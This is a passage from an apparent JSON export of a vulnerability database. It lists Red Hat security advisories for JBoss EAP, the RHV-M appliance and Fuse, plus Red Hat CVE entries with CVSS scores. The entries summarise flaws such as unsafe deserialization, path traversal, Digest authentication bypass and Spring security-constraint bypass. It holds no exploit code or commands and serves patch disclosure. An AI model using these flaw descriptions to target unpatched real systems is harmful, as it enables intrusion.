"CVE-2018-8088"], "modified": "2020-06-15T16:05:43", "id": "RHSA-2020:2561", "href": "https://access.redhat.com/errata/RHSA-2020:2561", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-19T20:37:58", "description": "Red Hat JBoss Enterprise Application Platform CD13 is a platform for Java applications based on the WildFly application runtime.\n\nThis release of Red Hat JBoss Enterprise Application Platform CD13 includes bug fixes and enhancements. \n\nSecurity Fix(es):\n\n* guava: Unbounded memory allocation in AtomicDoubleArray and CompoundOrdering classes allow remote attackers to cause a denial of service (CVE-2018-10237)\n* undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) (CVE-2018-1067)\n* jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489)\n* wildfly-core: Path traversal can allow the extraction of .war archives to write arbitrary files (Zip Slip) (CVE-2018-10862)\n* undertow: client can use bogus uri in digest authentication (CVE-2017-12196)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-15T16:09:25", "type": "redhat", "title": "(RHSA-2020:2562) Important: EAP Continuous Delivery Technical Preview Release 13 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4993", "CVE-2017-12196", "CVE-2017-7525", "CVE-2018-10237", "CVE-2018-1067", "CVE-2018-10862", "CVE-2018-7489"], "modified": "2020-06-15T16:10:17", "id": "RHSA-2020:2562", "href": "https://access.redhat.com/errata/RHSA-2020:2562", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T04:44:47", "description": "The RHV-M Virtual Appliance automates the process of installing and configuring the Red Hat Virtualization Manager. The appliance is available to download as an OVA file from the Customer Portal.\n\nThe following packages have been upgraded to a later upstream version: rhvm-appliance (4.2). (BZ#1558801, BZ#1563545)\n\nSecurity Fix(es):\n\n* python-paramiko: Authentication bypass in transport.py (CVE-2018-7750)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\n* ovirt-engine: account enumeration through login to web console (CVE-2018-1073)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088. The CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat).\n\nEnhancement(s):\n\n* Previously, the default memory allotment for the RHV-M Virtual Appliance was always large enough to include support for user additions.\n\nIn this release, the RHV-M Virtual Appliance includes a swap partition that enables the memory to be increased when required. (BZ#1422982)\n\n* Previously, the partitioning scheme for the RHV-M Virtual Appliance included two primary partitions, \"/\" and swap.\n\nIn this release, the disk partitioning scheme has been modified to match the scheme specified by NIST. The updated disk partitions are as follows:\n\n/boot 1G (primary)\n/home 1G (lvm)\n/tmp 2G (lvm)\n/var 20G (lvm)\n/var/log 10G (lvm)\n/var/log/audit 1G (lvm)\nswap 8G (lvm)\n/ 6G (primary) (BZ#1463853)\n\n* Previously, the version tag was used as part of the RPM's naming scheme, for example, \"4.1.timestamp\", which created differences between the upstream and downstream versioning schemes. In this release, the downstream versioning scheme is aligned with the upstream scheme and the timestamp has moved from the version tag to the release tag. (BZ#1464486)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-15T18:44:54", "type": "redhat", "title": "(RHSA-2018:1525) Important: rhvm-appliance security and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196", "CVE-2017-17485", "CVE-2017-7525", "CVE-2018-1073", "CVE-2018-1111", "CVE-2018-5968", "CVE-2018-7750", "CVE-2018-8088"], "modified": "2018-05-16T11:05:37", "id": "RHSA-2018:1525", "href": "https://access.redhat.com/errata/RHSA-2018:1525", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:46:05", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-12T16:34:43", "type": "redhat", "title": "(RHSA-2018:0480) Important: JBoss Enterprise Application Platform 7.1.1 for RHEL 7", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", "CVE-2018-5968"], "modified": "2018-03-12T16:40:38", "id": "RHSA-2018:0480", "href": "https://access.redhat.com/errata/RHSA-2018:0480", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:42:33", "description": "The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.1.1\n\nRefer to the JBoss Enterprise Application Platform 7.1 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release.\n\nSecurity Fix(es):\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-12T17:12:54", "type": "redhat", "title": "(RHSA-2018:0481) Important: jboss-ec2-eap package for EAP 7.1.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", "CVE-2018-5968"], "modified": "2018-03-12T17:13:53", "id": "RHSA-2018:0481", "href": "https://access.redhat.com/errata/RHSA-2018:0481", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:46:09", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-12T16:34:40", "type": "redhat", "title": "(RHSA-2018:0479) Important: JBoss Enterprise Application Platform 7.1.1 on RHEL 6", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", "CVE-2018-5968"], "modified": "2018-03-12T16:41:01", "id": "RHSA-2018:0479", "href": "https://access.redhat.com/errata/RHSA-2018:0479", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:44:28", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-03-12T16:34:34", "type": "redhat", "title": "(RHSA-2018:0478) Important: Red Hat JBoss Enterprise Application Platform 7.1.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", "CVE-2018-5968"], "modified": "2018-03-12T16:34:56", "id": "RHSA-2018:0478", "href": "https://access.redhat.com/errata/RHSA-2018:0478", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-19T20:38:19", "description": "Red Hat Fuse enables integration experts, application developers, and business users to collaborate and independently develop connected solutions.\n\nFuse is part of an agile integration solution. Its distributed approach allows teams to deploy integrated services where required. The API-centric, container-based architecture decouples services so they can be created, extended, and deployed independently.\n\nThis release of Red Hat Fuse 7.2 serves as a replacement for Red Hat Fuse 7.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* xmlrpc: Deserialization of untrusted Java object through <ex:serializable> tag (CVE-2016-5003)\n\n* tomcat: A bug in the UTF-8 decoder can lead to DoS (CVE-2018-1336)\n\n* ignite: Improper deserialization allows for code execution via GridClientJdkMarshaller endpoint (CVE-2018-8018)\n\n* apache-cxf: TLS hostname verification does not work correctly with com.sun.net.ssl.* (CVE-2018-8039)\n\n* xmlrpc: XML external entity vulnerability SSRF via a crafted DTD (CVE-2016-5002)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* spring-data-commons: XXE with Spring Data\u2019s XMLBeam integration (CVE-2018-1259)\n\n* kafka: Users can perform Broker actions via crafted fetch requests, interfering with data replication and causing data lass (CVE-2018-1288)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* camel-mail: path traversal vulnerability (CVE-2018-8041)\n\n* vertx: Improper neutralization of CRLF sequences allows remote attackers to inject arbitrary HTTP response headers (CVE-2018-12537)\n\n* spring-framework: ReDoS Attack with spring-messaging (CVE-2018-1257)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Eedo Shapira (GE Digital) for reporting CVE-2018-8041. The CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-04T15:58:22", "type": "redhat", "title": "(RHSA-2018:3768) Important: Red Hat Fuse 7.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5002", "CVE-2016-5003", "CVE-2017-12196", "CVE-2018-12537", "CVE-2018-1257", "CVE-2018-1259", "CVE-2018-1288", "CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8018", "CVE-2018-8039", "CVE-2018-8041"], "modified": "2018-12-04T15:59:22", "id": "RHSA-2018:3768", "href": "https://access.redhat.com/errata/RHSA-2018:3768", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-07-07T11:10:51", "description": "In Spark before 2.7.2, a remote attacker can read unintended static files via various representations of absolute or relative pathnames, as demonstrated by file: URLs and directory traversal sequences. NOTE: this product is unrelated to Ignite Realtime Spark.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-04-07T11:36:10", "type": "redhatcve", "title": "CVE-2018-9159", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9159"], "modified": "2022-07-07T11:08:34", "id": "RH:CVE-2018-9159", "href": "https://access.redhat.com/security/cve/cve-2018-9159", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-06T08:51:43", "description": "It was discovered that when using Digest authentication, the server does not ensure that the value of the URI in the authorization header matches the URI in the HTTP request line. This allows the attacker to execute a MITM attack and access the desired content on the server.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-04T17:12:27", "type": "redhatcve", "title": "CVE-2017-12196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196"], "modified": "2022-08-06T07:39:25", "id": "RH:CVE-2017-12196", "href": "https://access.redhat.com/security/cve/cve-2017-12196", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-07T11:10:52", "description": "Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-08T04:49:08", "type": "redhatcve", "title": "CVE-2017-8046", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8046"], "modified": "2022-07-07T09:46:21", "id": "RH:CVE-2017-8046", "href": "https://access.redhat.com/security/cve/cve-2017-8046", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T11:10:42", "description": "In Apache Ignite 2.3 or earlier, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when 3-rd party vulnerable classes are present in Ignite classpath. The vulnerability can be exploited if the one sends a specially prepared form of a serialized object to one of the deserialization endpoints of some Ignite components - discovery SPI, Ignite persistence, Memcached endpoint, socket steamer.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-03T09:19:16", "type": "redhatcve", "title": "CVE-2018-1295", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1295"], "modified": "2022-07-07T10:19:34", "id": "RH:CVE-2018-1295", "href": "https://access.redhat.com/security/cve/cve-2018-1295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T11:11:08", "description": "Spring Security (Spring Security 4.1.x before 4.1.5, 4.2.x before 4.2.4, and 5.0.x before 5.0.1; and Spring Framework 4.3.x before 4.3.14 and 5.0.x before 5.0.3) does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification. Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. In this particular attack, different character encodings used in path parameters allows secured Spring MVC static resource URLs to be bypassed.\n#### Mitigation\n\nAs a general precaution, users are encouraged to separate public and private resources. For example, separating static resources and mapping them to /resources/public/** and /resources/private/** is preferred to having one common root with mixed public and private resource content underneath. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-02-05T11:49:35", "type": "redhatcve", "title": "CVE-2018-1199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2022-07-07T10:19:13", "id": "RH:CVE-2018-1199", "href": "https://access.redhat.com/security/cve/cve-2018-1199", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-08-15T08:53:37", "description": "In Spark before 2.7.2, a remote attacker can read unintended static files via various representations of absolute or relative pathnames, as demonstrated by file: URLs and directory traversal sequences. NOTE: 